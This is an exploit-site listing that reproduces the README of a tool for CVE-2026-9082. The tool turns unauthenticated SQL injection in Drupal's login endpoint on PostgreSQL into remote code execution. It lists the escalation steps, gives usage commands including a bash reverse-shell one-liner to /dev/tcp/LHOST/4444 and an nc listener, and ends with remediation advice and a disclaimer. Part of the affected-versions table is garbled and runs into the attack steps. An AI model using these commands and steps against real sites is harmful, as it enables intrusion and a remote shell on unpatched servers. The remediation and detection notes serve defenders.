Exploit for SQL Injection in Drupal CVE-2026-9082

Name: Exploit for SQL Injection in Drupal CVE-2026-9082
Rating: 5 (14 reviews)
2026-06-07 | CVSS 9.8
## https://sploitus.com/exploit?id=9B5243ED-D9B1-5012-9F82-B3E47E6BC342
# CVE-2026-9082

Unauthenticated SQL injection in Drupal Core on PostgreSQL via `POST /user/login`, escalated to remote code execution through PostgreSQL `session_preload_libraries`.

Unlike existing public exploits that target JSON:API, this uses the **login endpoint** — always available, no modules or published content required.

> **Advisory:** [SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004) | Risk: 23/25 (Highly Critical) | [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

## Affected versions

Only Drupal sites backed by **PostgreSQL** are vulnerable.

| Branch | Vulnerable | Patched |
|---|---|---|
| 11.3.x |  `lo_put` -> `lo_export`)
4. **Rewrite** `postgresql.auto.conf` to set `session_preload_libraries` and `dynamic_library_path`
5. **Reload** config with `pg_reload_conf()`
6. **Trigger** a new backend connection — PostgreSQL loads the module and executes the command
7. **Read** command output via `pg_read_file()`
8. **Cleanup** — restore original config and reload

## Prerequisites

**SQL injection** (`cve_2026_9082_check.py`):
- Drupal on PostgreSQL, any unpatched version
- No authentication required
- No JSON:API module required
- No published content required

**Remote code execution** (`cve_2026_9082_rce.py`):
- All of the above, plus:
- Database user must be a PostgreSQL **superuser**
- `docker` available locally (for cross-compilation on macOS)

## Usage

### Install dependencies

```bash
pip install -r requirements.txt
```

### SQLi check

```bash
python3 cve_2026_9082_check.py http://target:8081
```

With a proxy (Burp, mitmproxy, etc.):

```bash
python3 cve_2026_9082_check.py http://target:8081 --proxy http://127.0.0.1:8080
```

### Remote code execution

```bash
# Run a command
python3 cve_2026_9082_rce.py http://target:8081 "id"

# Reverse shell
python3 cve_2026_9082_rce.py http://target:8081 \
  "bash -c 'bash -i >& /dev/tcp/LHOST/4444 0>&1'"

# Listener
nc -lvnp 4444
```

## Demo

SQLi validation against a vulnerable instance:

![SQLi check output](images/check.png)

Escalation to remote code execution:

![RCE exploit output](images/rce.png)

## Remediation

**Update Drupal immediately** to a patched version:

- 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, or 10.4.10

If you cannot update right away:
- Switch to a **non-superuser** database account to prevent RCE escalation
- Monitor logs for anomalous `POST /user/login` requests with JSON objects in the `name` field

Patches and details: [SA-CORE-2026-004](https://www.drupal.org/sa-core-2026-004)

## Timeline

| Date | Event |
|---|---|
| 2026-05-20 | Drupal publishes SA-CORE-2026-004, patches released |
| 2026-05-22 | Active exploitation in the wild, added to CISA KEV |
| 2026-05-26 | Ambionics publishes SQLi-to-RCE technique via JSON:API |
| 2026-06-07 | This tool released |

## Credits

- **Vulnerability reported by** [Michael Maturi](https://www.drupal.org/sa-core-2026-004)
- **Login vector** (`/user/login`) described by [bitk & jfellus](https://www.yeswehack.com/news/cve-2026-9082-postgresql-drupal) (YesWeHack)
- **RCE technique** (`session_preload_libraries`) by [N. Maccary / Ambionics](https://blog.lexfo.fr/drupal-postgresql-sqli-to-rce.html) (Lexfo)
- **This implementation** — RCE adapted for the `/user/login` vector by r0m41n

## Disclaimer

This tool is provided for **authorized security testing** and **educational purposes only**.

Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse of this software. Always obtain proper authorization before testing systems you do not own.